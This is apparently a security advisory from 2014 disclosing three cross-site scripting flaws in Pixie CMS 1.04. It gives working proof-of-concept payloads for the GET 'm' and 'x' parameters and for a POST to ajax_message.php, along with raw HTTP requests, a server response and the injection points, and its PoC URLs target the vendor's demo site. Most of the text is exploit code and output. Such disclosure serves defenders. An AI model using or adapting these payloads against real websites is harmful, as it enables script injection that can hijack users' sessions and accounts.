#Title: Pixie 1.04 CMS - Multiple XSS
#Version: 1.04 (Latest ATM)
#Vendor: getpixie.co.uk
#Demo: demo.getpixie.co.uk
#Date: 01.26.2014
#Contact: smash[at]devilteam.pl
1. Cross Site Scripting - GET 'm' parameter
Request:
host/?s=login&m=forgotten" onload=alert(666) bad="
Injection point:
<body class="pixie y2014 m1 d26 h12 s_login m_forgotten\" onload=alert(666) bad=\"">
PoC:
demo.getpixie.co.uk/admin/?s=login&m=forgotten" onload=alert(666) bad="
2. Cross Site Scripting - POST message
Request:
POST /admin/admin/modules/ajax_message.php HTTP/1.1
Host: demo.getpixie.co.uk
message=<script>alert(666)</script>
Response:
HTTP/1.1 200 OK
Date: Sun, 26 Jan 2014 12:08:09 GMT
Server: Apache
X-Powered-By: PHP/5.3.28
Cache-Control: max-age=1
Expires: Sun, 26 Jan 2014 12:08:10 GMT
Content-Length: 264
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
<span class="message_text_error"><img src="admin/theme/images/icons/error.png" /><script>alert(666)</script></span><span class="message_back"> (<a href="javascript:history.go(-1);" title="Back (Will reload any submitted form data)">go back »</a>)</span>
3. Cross Site Scripting - GET 'x' parameter
Request:
host/admin/index.php?s=publish&m=static&x=page-1" onload=alert(666) bad="&edit=78
Injection point:
<body class="pixie y2014 m1 d26 h12 s_login m_static x_page-1\" onload=alert(666) bad=\"">
(...)
<script type="text/javascript" src="jscript/pixie.js.php?s=login&x=page-1\" onload=alert(666) bad=\"&advmode=Toggle advanced Mode"></script>
PoC:
demo.getpixie.co.uk/admin/index.php?s=publish&m=static&x=page-1" onload=alert(666) bad="&edit=78
